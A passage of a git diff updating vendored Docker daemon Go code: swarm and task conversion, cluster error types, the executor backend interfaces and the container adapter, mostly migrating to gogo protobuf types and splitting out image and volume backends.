swarmtypes.RuntimeNetworkAttachment) + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go index 606e00a69b..ae97a4b61d 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go @@ -1,13 +1,13 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( "fmt" "strings" - "time" types "github.com/docker/docker/api/types/swarm" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/docker/swarmkit/ca" + gogotypes "github.com/gogo/protobuf/types" ) // SwarmFromGRPC converts a grpc Cluster to a Swarm. @@ -29,7 +29,17 @@ func SwarmFromGRPC(c swarmapi.Cluster) types.Swarm { EncryptionConfig: types.EncryptionConfig{ AutoLockManagers: c.Spec.EncryptionConfig.AutoLockManagers, }, + CAConfig: types.CAConfig{ + // do not include the signing CA cert or key (it should already be redacted via the swarm APIs) - + // the key because it's secret, and the cert because otherwise doing a get + update on the spec + // can cause issues because the key would be missing and the cert wouldn't + ForceRotate: c.Spec.CAConfig.ForceRotate, + }, + }, + TLSInfo: types.TLSInfo{ + TrustRoot: string(c.RootCA.CACert), }, + RootRotationInProgress: c.RootCA.RootRotation != nil, }, JoinTokens: types.JoinTokens{ Worker: c.RootCA.JoinTokens.Worker, @@ -37,27 +47,33 @@ func SwarmFromGRPC(c swarmapi.Cluster) types.Swarm { }, } - heartbeatPeriod, _ := ptypes.Duration(c.Spec.Dispatcher.HeartbeatPeriod) + issuerInfo, err := ca.IssuerFromAPIRootCA(&c.RootCA) + if err == nil && issuerInfo != nil { + swarm.TLSInfo.CertIssuerSubject = issuerInfo.Subject + swarm.TLSInfo.CertIssuerPublicKey = issuerInfo.PublicKey + } + + heartbeatPeriod, _ := gogotypes.DurationFromProto(c.Spec.Dispatcher.HeartbeatPeriod) swarm.Spec.Dispatcher.HeartbeatPeriod = heartbeatPeriod - swarm.Spec.CAConfig.NodeCertExpiry, _ = ptypes.Duration(c.Spec.CAConfig.NodeCertExpiry) + swarm.Spec.CAConfig.NodeCertExpiry, _ = gogotypes.DurationFromProto(c.Spec.CAConfig.NodeCertExpiry) for _, ca := range c.Spec.CAConfig.ExternalCAs { swarm.Spec.CAConfig.ExternalCAs = append(swarm.Spec.CAConfig.ExternalCAs, &types.ExternalCA{ Protocol: types.ExternalCAProtocol(strings.ToLower(ca.Protocol.String())), URL: ca.URL, Options: ca.Options, + CACert: string(ca.CACert), }) } // Meta swarm.Version.Index = c.Meta.Version.Index - swarm.CreatedAt, _ = ptypes.Timestamp(c.Meta.CreatedAt) - swarm.UpdatedAt, _ = ptypes.Timestamp(c.Meta.UpdatedAt) + swarm.CreatedAt, _ = gogotypes.TimestampFromProto(c.Meta.CreatedAt) + swarm.UpdatedAt, _ = gogotypes.TimestampFromProto(c.Meta.UpdatedAt) // Annotations - swarm.Spec.Name = c.Spec.Annotations.Name - swarm.Spec.Labels = c.Spec.Annotations.Labels + swarm.Spec.Annotations = annotationsFromGRPC(c.Spec.Annotations) return swarm } @@ -98,11 +114,19 @@ func MergeSwarmSpecToGRPC(s types.Spec, spec swarmapi.ClusterSpec) (swarmapi.Clu spec.Raft.ElectionTick = uint32(s.Raft.ElectionTick) } if s.Dispatcher.HeartbeatPeriod != 0 { - spec.Dispatcher.HeartbeatPeriod = ptypes.DurationProto(time.Duration(s.Dispatcher.HeartbeatPeriod)) + spec.Dispatcher.HeartbeatPeriod = gogotypes.DurationProto(s.Dispatcher.HeartbeatPeriod) } if s.CAConfig.NodeCertExpiry != 0 { - spec.CAConfig.NodeCertExpiry = ptypes.DurationProto(s.CAConfig.NodeCertExpiry) + spec.CAConfig.NodeCertExpiry = gogotypes.DurationProto(s.CAConfig.NodeCertExpiry) + } + if s.CAConfig.SigningCACert != "" { + spec.CAConfig.SigningCACert = []byte(s.CAConfig.SigningCACert) + } + if s.CAConfig.SigningCAKey != "" { + // do propagate the signing CA key here because we want to provide it TO the swarm APIs + spec.CAConfig.SigningCAKey = []byte(s.CAConfig.SigningCAKey) } + spec.CAConfig.ForceRotate = s.CAConfig.ForceRotate for _, ca := range s.CAConfig.ExternalCAs { protocol, ok := swarmapi.ExternalCA_CAProtocol_value[strings.ToUpper(string(ca.Protocol))] @@ -113,6 +137,7 @@ func MergeSwarmSpecToGRPC(s types.Spec, spec swarmapi.ClusterSpec) (swarmapi.Clu Protocol: swarmapi.ExternalCA_CAProtocol(protocol), URL: ca.URL, Options: ca.Options, + CACert: []byte(ca.CACert), }) } diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/task.go b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go index d0cf89c288..72e2805e1e 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/task.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go @@ -1,70 +1,58 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( "strings" types "github.com/docker/docker/api/types/swarm" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" ) // TaskFromGRPC converts a grpc Task to a Task. -func TaskFromGRPC(t swarmapi.Task) types.Task { - if t.Spec.GetAttachment() != nil { - return types.Task{} - } - containerConfig := t.Spec.Runtime.(*swarmapi.TaskSpec_Container).Container +func TaskFromGRPC(t swarmapi.Task) (types.Task, error) { containerStatus := t.Status.GetContainer() - networks := make([]types.NetworkAttachmentConfig, 0, len(t.Spec.Networks)) - for _, n := range t.Spec.Networks { - networks = append(networks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + taskSpec, err := taskSpecFromGRPC(t.Spec) + if err != nil { + return types.Task{}, err } - task := types.Task{ - ID: t.ID, - Annotations: types.Annotations{ - Name: t.Annotations.Name, - Labels: t.Annotations.Labels, - }, - ServiceID: t.ServiceID, - Slot: int(t.Slot), - NodeID: t.NodeID, - Spec: types.TaskSpec{ - ContainerSpec: containerSpecFromGRPC(containerConfig), - Resources: resourcesFromGRPC(t.Spec.Resources), - RestartPolicy: restartPolicyFromGRPC(t.Spec.Restart), - Placement: placementFromGRPC(t.Spec.Placement), - LogDriver: driverFromGRPC(t.Spec.LogDriver), - Networks: networks, - }, + ID: t.ID, + Annotations: annotationsFromGRPC(t.Annotations), + ServiceID: t.ServiceID, + Slot: int(t.Slot), + NodeID: t.NodeID, + Spec: taskSpec, Status: types.TaskStatus{ State: types.TaskState(strings.ToLower(t.Status.State.String())), Message: t.Status.Message, Err: t.Status.Err, }, - DesiredState: types.TaskState(strings.ToLower(t.DesiredState.String())), + DesiredState: types.TaskState(strings.ToLower(t.DesiredState.String())), + GenericResources: GenericResourcesFromGRPC(t.AssignedGenericResources), } // Meta task.Version.Index = t.Meta.Version.Index - task.CreatedAt, _ = ptypes.Timestamp(t.Meta.CreatedAt) - task.UpdatedAt, _ = ptypes.Timestamp(t.Meta.UpdatedAt) + task.CreatedAt, _ = gogotypes.TimestampFromProto(t.Meta.CreatedAt) + task.UpdatedAt, _ = gogotypes.TimestampFromProto(t.Meta.UpdatedAt) - task.Status.Timestamp, _ = ptypes.Timestamp(t.Status.Timestamp) + task.Status.Timestamp, _ = gogotypes.TimestampFromProto(t.Status.Timestamp) if containerStatus != nil { - task.Status.ContainerStatus.ContainerID = containerStatus.ContainerID - task.Status.ContainerStatus.PID = int(containerStatus.PID) - task.Status.ContainerStatus.ExitCode = int(containerStatus.ExitCode) + task.Status.ContainerStatus = &types.ContainerStatus{ + ContainerID: containerStatus.ContainerID, + PID: int(containerStatus.PID), + ExitCode: int(containerStatus.ExitCode), + } } // NetworksAttachments for _, na := range t.Networks { - task.NetworksAttachments = append(task.NetworksAttachments, networkAttachementFromGRPC(na)) + task.NetworksAttachments = append(task.NetworksAttachments, networkAttachmentFromGRPC(na)) } if t.Status.PortStatus == nil { - return task + return task, nil } for _, p := range t.Status.PortStatus.Ports { @@ -77,5 +65,5 @@ func TaskFromGRPC(t swarmapi.Task) types.Task { }) } - return task + return task, nil } diff --git a/vendor/github.com/docker/docker/daemon/cluster/errors.go b/vendor/github.com/docker/docker/daemon/cluster/errors.go new file mode 100644 index 0000000000..9ec716b1ba --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/errors.go @@ -0,0 +1,61 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +const ( + // errNoSwarm is returned on leaving a cluster that was never initialized + errNoSwarm notAvailableError = "This node is not part of a swarm" + + // errSwarmExists is returned on initialize or join request for a cluster that has already been activated + errSwarmExists notAvailableError = "This node is already part of a swarm. Use \"docker swarm leave\" to leave this swarm and join another one." + + // errSwarmJoinTimeoutReached is returned when cluster join could not complete before timeout was reached. + errSwarmJoinTimeoutReached notAvailableError = "Timeout was reached before node joined. The attempt to join the swarm will continue in the background. Use the \"docker info\" command to see the current swarm status of your node." + + // errSwarmLocked is returned if the swarm is encrypted and needs a key to unlock it. + errSwarmLocked notAvailableError = "Swarm is encrypted and needs to be unlocked before it can be used. Please use \"docker swarm unlock\" to unlock it." + + // errSwarmCertificatesExpired is returned if docker was not started for the whole validity period and they had no chance to renew automatically. + errSwarmCertificatesExpired notAvailableError = "Swarm certificates have expired. To replace them, leave the swarm and join again." + + // errSwarmNotManager is returned if the node is not a swarm manager. + errSwarmNotManager notAvailableError = "This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager." +) + +type notAllowedError string + +func (e notAllowedError) Error() string { + return string(e) +} + +func (e notAllowedError) Forbidden() {} + +type notAvailableError string + +func (e notAvailableError) Error() string { + return string(e) +} + +func (e notAvailableError) Unavailable() {} + +type configError string + +func (e configError) Error() string { + return string(e) +} + +func (e configError) InvalidParameter() {} + +type invalidUnlockKey struct{} + +func (invalidUnlockKey) Error() string { + return "swarm could not be unlocked: invalid key provided" +} + +func (invalidUnlockKey) Unauthorized() {} + +type notLockedError struct{} + +func (notLockedError) Error() string { + return "swarm is not locked" +} + +func (notLockedError) Conflict() {} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go index 0f1da38558..1f2312ab40 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go @@ -1,10 +1,12 @@ -package executor +package executor // import "github.com/docker/docker/daemon/cluster/executor" import ( + "context" "io" "time" "github.com/docker/distribution" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/backend" "github.com/docker/docker/api/types/container" @@ -12,39 +14,40 @@ import ( "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/network" swarmtypes "github.com/docker/docker/api/types/swarm" + containerpkg "github.com/docker/docker/container" clustertypes "github.com/docker/docker/daemon/cluster/provider" + networkSettings "github.com/docker/docker/daemon/network" "github.com/docker/docker/plugin" - "github.com/docker/docker/reference" + volumeopts "github.com/docker/docker/volume/service/opts" "github.com/docker/libnetwork" "github.com/docker/libnetwork/cluster" networktypes "github.com/docker/libnetwork/types" "github.com/docker/swarmkit/agent/exec" - "golang.org/x/net/context" ) // Backend defines the executor component for a swarm agent. type Backend interface { CreateManagedNetwork(clustertypes.NetworkCreateRequest) error - DeleteManagedNetwork(name string) error + DeleteManagedNetwork(networkID string) error FindNetwork(idName string) (libnetwork.Network, error) - SetupIngress(req clustertypes.NetworkCreateRequest, nodeIP string) error - PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error + SetupIngress(clustertypes.NetworkCreateRequest, string) (<-chan struct{}, error) + ReleaseIngress() (<-chan struct{}, error) CreateManagedContainer(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) ContainerStart(name string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error ContainerStop(name string, seconds *int) error - ContainerLogs(context.Context, string, *backend.ContainerLogsConfig, chan struct{}) error + ContainerLogs(context.Context, string, *types.ContainerLogsOptions) (msgs <-chan *backend.LogMessage, tty bool, err error) ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error ActivateContainerServiceBinding(containerName string) error DeactivateContainerServiceBinding(containerName string) error UpdateContainerServiceConfig(containerName string, serviceConfig *clustertypes.ServiceConfig) error ContainerInspectCurrent(name string, size bool) (*types.ContainerJSON, error) - ContainerWaitWithContext(ctx context.Context, name string) error + ContainerWait(ctx context.Context, name string, condition containerpkg.WaitCondition) (<-chan containerpkg.StateStatus, error) ContainerRm(name string, config *types.ContainerRmConfig) error ContainerKill(name string, sig uint64) error - SetContainerSecretStore(name string, store exec.SecretGetter) error + SetContainerDependencyStore(name string, store exec.DependencyGetter) error SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error + SetContainerConfigReferences(name string, refs []*swarmtypes.ConfigReference) error SystemInfo() (*types.Info, error) - VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) Containers(config *types.ContainerListOptions) ([]*types.Container, error) SetNetworkBootstrapKeys([]*networktypes.EncryptionKey) error DaemonJoinsCluster(provider cluster.Provider) @@ -54,8 +57,19 @@ type Backend interface { UnsubscribeFromEvents(listener chan interface{}) UpdateAttachment(string, string, string, *network.NetworkingConfig) error WaitForDetachment(context.Context, string, string, string, string) error - GetRepository(context.Context, reference.NamedTagged, *types.AuthConfig) (distribution.Repository, bool, error) - LookupImage(name string) (*types.ImageInspect, error) PluginManager() *plugin.Manager PluginGetter() *plugin.Store + GetAttachmentStore() *networkSettings.AttachmentStore +} + +// VolumeBackend is used by an executor to perform volume operations +type VolumeBackend interface { + Create(ctx context.Context, name, driverName string, opts ...volumeopts.CreateOption) (*types.Volume, error) +} + +// ImageBackend is used by an executor to perform image operations +type ImageBackend interface { + PullImage(ctx context.Context, image, tag, platform string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error + GetRepository(context.Context, reference.Named, *types.AuthConfig) (distribution.Repository, bool, error) + LookupImage(name string) (*types.ImageInspect, error) } diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go index f82f8b54d3..fdf1ee2ec7 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go @@ -1,30 +1,35 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( + "context" "encoding/base64" "encoding/json" + "errors" "fmt" "io" "os" + "runtime" "strings" "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/backend" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/events" + containerpkg "github.com/docker/docker/container" + "github.com/docker/docker/daemon" "github.com/docker/docker/daemon/cluster/convert" executorpkg "github.com/docker/docker/daemon/cluster/executor" - "github.com/docker/docker/reference" + volumeopts "github.com/docker/docker/volume/service/opts" "github.com/docker/libnetwork" "github.com/docker/swarmkit/agent/exec" "github.com/docker/swarmkit/api" "github.com/docker/swarmkit/log" - "github.com/docker/swarmkit/protobuf/ptypes" - "golang.org/x/net/context" + gogotypes "github.com/gogo/protobuf/types" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" "golang.org/x/time/rate" ) @@ -32,21 +37,25 @@ import ( // are mostly naked calls to the client API, seeded with information from // containerConfig. type containerAdapter struct { - backend executorpkg.Backend - container *containerConfig - secrets exec.SecretGetter + backend executorpkg.Backend + imageBackend executorpkg.ImageBackend + volumeBackend executorpkg.VolumeBackend + container *containerConfig + dependencies exec.DependencyGetter } -func newContainerAdapter(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*containerAdapter, error) { - ctnr, err := newContainerConfig(task) +func newContainerAdapter(b executorpkg.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend, task *api.Task, node *api.NodeDescription, dependencies exec.DependencyGetter) (*containerAdapter, error) { + ctnr, err := newContainerConfig(task, node) if err != nil { return nil, err } return &containerAdapter{ - container: ctnr, - backend: b, - secrets: secrets, + container: ctnr, + backend: b, + imageBackend: i, + volumeBackend: v, + dependencies: dependencies, }, nil } @@ -54,16 +63,16 @@ func (c *containerAdapter) pullImage(ctx context.Context) error { spec := c.container.spec() // Skip pulling if the image is referenced by image ID. - if _, err := digest.ParseDigest(spec.Image); err == nil { + if _, err := digest.Parse(spec.Image); err == nil { return nil } // Skip pulling if the image is referenced by digest and already // exists locally. - named, err := reference.ParseNamed(spec.Image) + named, err := reference.ParseNormalizedNamed(spec.Image) if err == nil { if _, ok := named.(reference.Canonical); ok { - _, err := c.backend.LookupImage(spec.Image) + _, err := c.imageBackend.LookupImage(spec.Image) if err == nil { return nil } @@ -86,7 +95,10 @@ func (c *containerAdapter) pullImage(ctx context.Context) error { pr, pw := io.Pipe() metaHeaders := map[string][]string{} go func() { - err := c.backend.PullImage(ctx, c.container.image(), "", metaHeaders, authConfig, pw) + // TODO @jhowardmsft LCOW Support: This will need revisiting as + // the stack is built up to include LCOW support for swarm. + platform := runtime.GOOS + err := c.imageBackend.PullImage(ctx, c.container.image(), "", platform, metaHeaders, authConfig, pw) pw.CloseWithError(err) }() @@ -137,8 +149,8 @@ func (c *containerAdapter) pullImage(ctx context.Context) error { } func (c *containerAdapter) createNetworks(ctx context.Context) error { - for _, network := range c.container.networks() { - ncr, err := c.container.networkCreateRequest(network) + for name := range c.container.networksAttachments { + ncr, err := c.container.networkCreateRequest(name) if err != nil { return err } @@ -147,7 +159,11 @@ func (c *containerAdapter) createNetworks(ctx context.Context) error { if _, ok := err.(libnetwork.NetworkNameError); ok { continue } - + // We will continue if CreateManagedNetwork returns PredefinedNetworkError error. + // Other callers still can treat it as Error. + if _, ok := err.(daemon.PredefinedNetworkError); ok { + continue + } return err } } @@ -156,15 +172,15 @@ func (c *containerAdapter) createNetworks(ctx context.Context) error { } func (c *containerAdapter) removeNetworks(ctx context.Context) error { - for _, nid := range c.container.networks() { - if err := c.backend.DeleteManagedNetwork(nid); err != nil { + for name, v := range c.container.networksAttachments { + if err := c.backend.DeleteManagedNetwork(v.Network.ID); err != nil { switch err.(type) { case *libnetwork.ActiveEndpointsError: continue case libnetwork.ErrNoSuchNetwork: continue default: - log.G(ctx).Errorf("network %s remove failed: %v", nid, err) + log.G(ctx).Errorf("network %s remove failed: %v", name, err) return err } } @@ -174,7 +190,7 @@ func (c *containerAdapter) removeNetworks(ctx context.Context) error { } func (c *containerAdapter) networkAttach(ctx context.Context) error { - config := c.container.createNetworkingConfig() + config := c.container.createNetworkingConfig(c.backend) var ( networkName string @@ -189,11 +205,11 @@ func (c *containerAdapter) networkAttach(ctx context.Context) error { } } - return c.backend.UpdateAttachment(networkName, networkID, c.container.id(), config) + return c.backend.UpdateAttachment(networkName, networkID, c.container.networkAttachmentContainerID(), config) } func (c *containerAdapter) waitForDetach(ctx context.Context) error { - config := c.container.createNetworkingConfig() + config := c.container.createNetworkingConfig(c.backend) var ( networkName string @@ -208,26 +224,25 @@ func (c *containerAdapter) waitForDetach(ctx context.Context) error { } } - return c.backend.WaitForDetachment(ctx, networkName, networkID, c.container.taskID(), c.container.id()) + return c.backend.WaitForDetachment(ctx, networkName, networkID, c.container.taskID(), c.container.networkAttachmentContainerID()) } func (c *containerAdapter) create(ctx context.Context) error { var cr containertypes.ContainerCreateCreatedBody var err error - if cr, err = c.backend.CreateManagedContainer(types.ContainerCreateConfig{ Name: c.container.name(), Config: c.container.config(), HostConfig: c.container.hostConfig(), // Use the first network in container create - NetworkingConfig: c.container.createNetworkingConfig(), + NetworkingConfig: c.container.createNetworkingConfig(c.backend), }); err != nil { return err } // Docker daemon currently doesn't support multiple networks in container create // Connect to all other networks - nc := c.container.connectNetworkingConfig() + nc := c.container.connectNetworkingConfig(c.backend) if nc != nil { for n, ep := range nc.EndpointsConfig { @@ -239,24 +254,25 @@ func (c *containerAdapter) create(ctx context.Context) error { container := c.container.task.Spec.GetContainer() if container == nil { - return fmt.Errorf("unable to get container from task spec") + return errors.New("unable to get container from task spec") } - // configure secrets - if err := c.backend.SetContainerSecretStore(cr.ID, c.secrets); err != nil { + if err := c.backend.SetContainerDependencyStore(cr.ID, c.dependencies); err != nil { return err } - refs := convert.SecretReferencesFromGRPC(container.Secrets) - if err := c.backend.SetContainerSecretReferences(cr.ID, refs); err != nil { + // configure secrets + secretRefs := convert.SecretReferencesFromGRPC(container.Secrets) + if err := c.backend.SetContainerSecretReferences(cr.ID, secretRefs); err != nil { return err } - if err := c.backend.UpdateContainerServiceConfig(cr.ID, c.container.serviceConfig()); err != nil { + configRefs := convert.ConfigReferencesFromGRPC(container.Configs) + if err := c.backend.SetContainerConfigReferences(cr.ID, configRefs); err != nil { return err } - return nil + return c.backend.UpdateContainerServiceConfig(cr.ID, c.container.serviceConfig()) } // checkMounts ensures that the provided mounts won't have any host-specific @@ -331,8 +347,8 @@ func (c *containerAdapter) events(ctx context.Context) <-chan events.Message { return eventsq } -func (c *containerAdapter) wait(ctx context.Context) error { - return c.backend.ContainerWaitWithContext(ctx, c.container.nameOrID()) +func (c *containerAdapter) wait(ctx context.Context) (<-chan containerpkg.StateStatus, error) { + return c.backend.ContainerWait(ctx, c.container.nameOrID(), containerpkg.WaitConditionNotRunning) } func (c *containerAdapter) shutdown(ctx context.Context) error { @@ -375,7 +391,10 @@ func (c *containerAdapter) createVolumes(ctx context.Context) error { req := c.container.volumeCreateRequest(&mount) // Check if this volume exists on the engine - if _, err := c.backend.VolumeCreate(req.Name, req.Driver, req.DriverOpts, req.Labels); err != nil { + if _, err := c.volumeBackend.Create(ctx, req.Name, req.Driver, + volumeopts.WithCreateOptions(req.DriverOpts), + volumeopts.WithCreateLabels(req.Labels), + ); err != nil { // TODO(amitshukla): Today, volume create through the engine api does not return an error // when the named volume with the same parameters already exists. // It returns an error if the driver name is different - that is a valid error @@ -395,35 +414,33 @@ func (c *containerAdapter) deactivateServiceBinding() error { return c.backend.DeactivateContainerServiceBinding(c.container.name()) } -func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscriptionOptions) (io.ReadCloser, error) { - reader, writer := io.Pipe() - - apiOptions := &backend.ContainerLogsConfig{ - ContainerLogsOptions: types.ContainerLogsOptions{ - Follow: options.Follow, +func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscriptionOptions) (<-chan *backend.LogMessage, error) { + apiOptions := &types.ContainerLogsOptions{ + Follow: options.Follow, - // TODO(stevvooe): Parse timestamp out of message. This - // absolutely needs to be done before going to production with - // this, at it is completely redundant. - Timestamps: true, - Details: false, // no clue what to do with this, let's just deprecate it. - }, - OutStream: writer, + // Always say yes to Timestamps and Details. we make the decision + // of whether to return these to the user or not way higher up the + // stack. + Timestamps: true, + Details: true, } if options.Since != nil { - since, err := ptypes.Timestamp(options.Since) + since, err := gogotypes.TimestampFromProto(options.Since) if err != nil { return nil, err } - apiOptions.Since = since.Format(time.RFC3339Nano) + // print since as this formatted string because the docker container + // logs interface expects it like this. + // see github.com/docker/docker/api/types/time.ParseTimestamps + apiOptions.Since = fmt.Sprintf("%d.%09d", since.Unix(), int64(since.Nanosecond())) } if options.Tail < 0 { // See protobuf documentation for details of how this works. apiOptions.Tail = fmt.Sprint(-options.Tail - 1) } else if options.Tail > 0 { - return nil, fmt.Errorf("tail relative to start of logs not supported via docker API") + return nil, errors.New("tail relative to start of logs not supported via docker API") } if len(options.Streams) == 0 { @@ -439,14 +456,11 @@ func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscription } } } - - chStarted := make(chan struct{}) - go func() { - defer writer.Close() - c.backend.ContainerLogs(ctx, c.container.name(), apiOptions, chStarted) - }() - - return reader, nil + msgs, _, err := c.backend.ContainerLogs(ctx, c.container.name(), apiOptions) + if err != nil { + return nil, err + } + return msgs, nil } // todo: typed/wrapped errors diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go index e0ee81a8b9..f0aa0b9577 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go @@ -1,10 +1,11 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( + "context" + executorpkg "github.com/docker/docker/daemon/cluster/executor" "github.com/docker/swarmkit/agent/exec" "github.com/docker/swarmkit/api" - "golang.org/x/net/context" ) // networkAttacherController implements agent.Controller against docker's API. @@ -20,8 +21,8 @@ type networkAttacherController struct { closed chan struct{} } -func newNetworkAttacherController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*networkAttacherController, error) { - adapter, err := newContainerAdapter(b, task, secrets) +func newNetworkAttacherController(b executorpkg.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend, task *api.Task, node *api.NodeDescription, dependencies exec.DependencyGetter) (*networkAttacherController, error) { + adapter, err := newContainerAdapter(b, i, v, task, node, dependencies) if err != nil { return nil, err } @@ -40,11 +41,7 @@ func (nc *networkAttacherController) Update(ctx context.Context, t *api.Task) er func (nc *networkAttacherController) Prepare(ctx context.Context) error { // Make sure all the networks that the task needs are created. - if err := nc.adapter.createNetworks(ctx); err != nil { - return err - } - - return nil + return nc.adapter.createNetworks(ctx) } func (nc *networkAttacherController) Start(ctx context.Context) error { @@ -69,11 +66,7 @@ func (nc *networkAttacherController) Terminate(ctx context.Context) error { func (nc *networkAttacherController) Remove(ctx context.Context) error { // Try removing the network referenced in this task in case this // task is the last one referencing it - if err := nc.adapter.removeNetworks(ctx); err != nil { - return err - } - - return nil + return nc.adapter.removeNetworks(ctx) } func (nc *networkAttacherController) Close() error { diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go index f033ad545e..77d21d2c1f 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( "errors" @@ -8,8 +8,9 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" enginecontainer "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/events" @@ -17,13 +18,16 @@ import ( enginemount "github.com/docker/docker/api/types/mount" "github.com/docker/docker/api/types/network" volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/daemon/cluster/convert" + executorpkg "github.com/docker/docker/daemon/cluster/executor" clustertypes "github.com/docker/docker/daemon/cluster/provider" - "github.com/docker/docker/reference" "github.com/docker/go-connections/nat" + netconst "github.com/docker/libnetwork/datastore" "github.com/docker/swarmkit/agent/exec" "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/docker/swarmkit/api/genericresource" "github.com/docker/swarmkit/template" + gogotypes "github.com/gogo/protobuf/types" ) const ( @@ -44,12 +48,12 @@ type containerConfig struct { // newContainerConfig returns a validated container config. No methods should // return an error if this function returns without error. -func newContainerConfig(t *api.Task) (*containerConfig, error) { +func newContainerConfig(t *api.Task, node *api.NodeDescription) (*containerConfig, error) { var c containerConfig - return &c, c.setTask(t) + return &c, c.setTask(t, node) } -func (c *containerConfig) setTask(t *api.Task) error { +func (c *containerConfig) setTask(t *api.Task, node *api.NodeDescription) error { if t.Spec.GetContainer() == nil && t.Spec.GetAttachment() == nil { return exec.ErrRuntimeUnsupported } @@ -74,7 +78,7 @@ func (c *containerConfig) setTask(t *api.Task) error { c.task = t if t.Spec.GetContainer() != nil { - preparedSpec, err := template.ExpandContainerSpec(t) + preparedSpec, err := template.ExpandContainerSpec(node, t) if err != nil { return err } @@ -86,7 +90,7 @@ func (c *containerConfig) setTask(t *api.Task) error { return nil } -func (c *containerConfig) id() string { +func (c *containerConfig) networkAttachmentContainerID() string { attachment := c.task.Spec.GetAttachment() if attachment == nil { return "" @@ -112,7 +116,7 @@ func (c *containerConfig) nameOrID() string { return c.name() } - return c.id() + return c.networkAttachmentContainerID() } func (c *containerConfig) name() string { @@ -132,11 +136,11 @@ func (c *containerConfig) name() string { func (c *containerConfig) image() string { raw := c.spec().Image - ref, err := reference.ParseNamed(raw) + ref, err := reference.ParseNormalizedNamed(raw) if err != nil { return raw } - return reference.WithDefaultTag(ref).String() + return reference.FamiliarString(reference.TagNameOnly(ref)) } func (c *containerConfig) portBindings() nat.PortMap { @@ -164,6 +168,18 @@ func (c *containerConfig) portBindings() nat.PortMap { return portBindings } +func (c *containerConfig) isolation() enginecontainer.Isolation { + return convert.IsolationFromGRPC(c.spec().Isolation) +} + +func (c *containerConfig) init() *bool { + if c.spec().Init == nil { + return nil + } + init := c.spec().Init.GetValue() + return &init +} + func (c *containerConfig) exposedPorts() map[nat.Port]struct{} { exposedPorts := make(map[nat.Port]struct{}) if c.task.Endpoint == nil { @@ -183,12 +199,16 @@ func (c *containerConfig) exposedPorts() map[nat.Port]struct{} { } func (c *containerConfig) config() *enginecontainer.Config { + genericEnvs := genericresource.EnvFormat(c.task.AssignedGenericResources, "DOCKER_RESOURCE") + env := append(c.spec().Env, genericEnvs...) + config := &enginecontainer.Config{ Labels: c.labels(), + StopSignal: c.spec().StopSignal, Tty: c.spec().TTY, OpenStdin: c.spec().OpenStdin, User: c.spec().User, - Env: c.spec().Env, + Env: 